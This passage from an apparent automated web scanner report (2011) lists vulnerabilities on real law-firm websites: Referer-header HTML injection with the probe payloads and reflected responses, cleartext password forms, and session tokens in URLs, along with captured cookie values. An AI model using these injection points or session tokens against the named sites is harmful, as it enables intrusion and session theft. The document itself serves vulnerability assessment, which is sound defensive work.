User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Find an Attorney or Professional</title>
       <meta na
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09">
...[SNIP]...

2.255. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /publications.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6ed"><a>0d08c6799e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /publications.cfm?id=2795&action=view HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Trade mark owner can object to resale of 'perfume te
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e">
...[SNIP]...

2.256. http://www.arnoldporter.com/remote_access.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /remote_access.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c070"><a>4421a84236f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /remote_access.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=6c070"><a>4421a84236f

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: OFFICE=;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=6c070"><a>4421a84236f">
...[SNIP]...

2.257. http://www.arnoldporter.com/search.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /search.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997bb"><a>c1452cc4d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /search.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=997bb"><a>c1452cc4d4

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Search Form</title>
       <meta name="Description" cont
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=997bb"><a>c1452cc4d4">
...[SNIP]...

2.258. http://www.arnoldporter.com/sitemap.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /sitemap.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91afd"><a>22110ca1882 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sitemap.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=91afd"><a>22110ca1882

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=91afd"><a>22110ca1882">
...[SNIP]...

2.259. http://www.fulbright.com/index.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605f4"><a>5f16750633f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Referer: http://www.google.com/search?hl=en&q=605f4"><a>5f16750633f

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:50:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A01%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D780%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:01 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=605f4"><a>5f16750633f">
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 6 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.fulbright.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A31%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D512%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:49:31 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
</p>

<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...

3.2. http://www.fulbright.com/index.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.cfm HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
</p>

<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...

3.3. http://www.fulbright.com/insite  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...
<br />
   <form id="insitesearch" name="OptInRegister" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">
<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...

3.4. http://www.fulbright.com/insite  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...
<br />
   <form id="loginOptIn" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">

<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...

3.5. http://www.political.cov.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.political.cov.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.political.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>Covington Political Broadcasting Law</title
...[SNIP]...
<div id="right_col_login_area">
                   Member Login
                   <form action="/login.cfm" method="POST" style="margin-top:7px; margin-bottom:0px;">
                       <div style="padding-bottom: 5px;">
...[SNIP]...
</div>
                                   <input type="password" class="small_text_box" name="password" maxlength="12" /></td>
...[SNIP]...

3.6. http://www.skadden.com/alumni/Index.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /alumni/Index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /alumni/Index.cfm HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                           <!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w
...[SNIP]...
<td align="left" valign="top">
<form method="post" action="alumni_authenticate.cfm" id="loginFrm">

   <!--table-->
...[SNIP]...
<td valign="top" style="padding-bottom:6px;"><input class="formLogin" type="password" name="aPassword" maxlength="75" onkeypress="checkEnterAlumni(event)" /></td>
...[SNIP]...

4. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_recognition_rankings.cfm

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /about_the_firm_recognition_rankings.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=AntonipillaiJustinS&amp;action=view&amp;id=420&amp;CFID=9488352&amp;CFTOKEN=58883300">Justin Antonipillai</a>
...[SNIP]...
</em> ranked Arnold & Porter as a leading law firm for International Arbitration and Capital Markets. The publication also ranked the following lawyers as "Leading Individuals": <a href="http://www.arnoldporter.com/professionals.cfm?u=DiRosaPaolo&action=view&id=967&CFID=9488352&CFTOKEN=58883300">Paolo Di Rosa</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=GehringFloresGaelaK&action=view&id=968&CFID=9488352&CFTOKEN=58883300">Gaela Gehring Flores</a> for International Arbitration; <a href="http://www.arnoldporter.com/professionals.cfm?u=HarringtonGregory&action=view&id=946&CFID=9488352&CFTOKEN=58883300">Gregory Harrington</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=StumpfMarkH&action=view&id=116&CFID=9488352&CFTOKEN=58883300">Mark Stumpf</a>
...[SNIP]...
</em> named Arnold &amp; Porter antitrust partner <a href="http://www.arnoldporter.com/professionals.cfm?u=FeinsteinDeborahL&amp;action=view&amp;id=29&amp;CFID=3285218&amp;CFTOKEN=60209382">Deborah Feinstein</a>
...[SNIP]...
</em> annual Awards Ceremony in London on June 22nd. The team, led by London partners <a href="http://www.arnoldporter.com/professionals.cfm?u=FrazerTim&action=view&id=277&CFID=2238313&CFTOKEN=85690966">Tim Frazer</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=HinchliffeSusan&action=view&id=234&CFID=2238313&CFTOKEN=85690966">Susan Hinchliffe</a>
...[SNIP]...
<p>Attorney General Eric Holder presented Arnold &amp; Porter counsel <a href="http://www.arnoldporter.com/professionals.cfm?u=PitofskyRobert&amp;action=view&amp;id=424&amp;CFID=1875550&amp;CFTOKEN=71164531">Robert Pitofsky</a>
...[SNIP]...
</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=DregerGingerR&amp;action=view&amp;id=5423&amp;CFID=476026&amp;CFTOKEN=73240865">Ginger Dreger</a>
...[SNIP]...
</em> named Arnold &amp; Porter partner <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&amp;action=view&amp;id=289&amp;CFID=417833&amp;CFTOKEN=96803455">William Baer</a>
...[SNIP]...
</a> and <a href="http://www.arnoldporter.com/professionals.cfm?u=RubelEricA&action=view&id=96&CFID=15574942&CFTOKEN=53050326">Eric Rubel</a>
...[SNIP]...
</em> named <a href="http://www.arnoldporter.com/professionals.cfm?u=BaerWilliam&amp;action=view&amp;id=289&amp;CFID=8038589&amp;CFTOKEN=38448975">William Baer</a>
...[SNIP]...
</a> the "Washington, DC Bankruptcy and Creditor-Debtor Rights Lawyer of the Year"; <a href="http://www.arnoldporter.com/professionals.cfm?u=GerrardMichaelB&amp;action=view&amp;id=189&amp;CFID=8038589&amp;CFTOKEN=38448975">Michael Gerrard</a> the "New York Environmental Lawyer of the Year" and <a href="http://www.arnoldporter.com/professionals.cfm?u=HawkeJohnDJr&amp;action=view&amp;id=716&amp;CFID=8038589&amp;CFTOKEN=38448975">John D. Hawke Jr.</a>
...[SNIP]...
ife sciences: regulatory, compliance &amp; competition; and product liability: mainly defendant; and was ranked as a "Leading Fi